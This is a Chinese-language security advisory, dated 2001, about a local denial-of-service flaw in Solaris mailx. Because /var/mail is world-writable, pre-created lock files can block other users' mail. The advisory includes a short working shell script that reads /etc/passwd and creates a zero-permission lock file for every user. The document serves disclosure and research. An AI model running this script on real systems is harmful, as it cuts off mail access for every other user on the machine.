Solaris mailx 锁文件拒绝服务攻击
发布日期:2001-01-06
更新日期:2001-01-06
受影响系统:
Sun Solaris 8.0
Sun Solaris 7.0
Sun Solaris 2.6
描述:
mailx 是绝大多数Unix操作系统上都有的一种Mail User Agent。Solaris携带的mailx
存在一些设计上的问题。缺省情况下,/var/mail目录是全局可写的。当
/var/mail/$LOGNAME.lock文件存在的时候,相应用户无法在此使用mailx。恶意的本
地用户可以提前建立任意用户对应的锁文件,从而导致相应用户无法正常使用mailx。
<* 来源:optyx (
optyx@uberhax0r.net) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
下列测试程序来自 optyx (optyx@uberhax0r.net)
-------------------------------------
#!/bin/sh
# Solaris mailx(1) username.lock proof of theory
# makes mailx not work for all users except
# those that can erase the lockfile
# even so mailx will hang for a long time
# Tested on Solaris 2.6, 7, 8
# by Optyx <optyx@uberhax0r.net>
# http://www.uberhax0r.net
echo "mailx-lock by optyx. http://www.uberhax0r.net"
for x in `cat /etc/passwd | cut -d':' -f1`;do
touch /var/mail/$x.lock
chmod 0 /var/mail/$x.lock
done
-------------------------------------
建议:
厂商补丁:
暂无
浏览次数:4406
严重程度:0(网友投票)
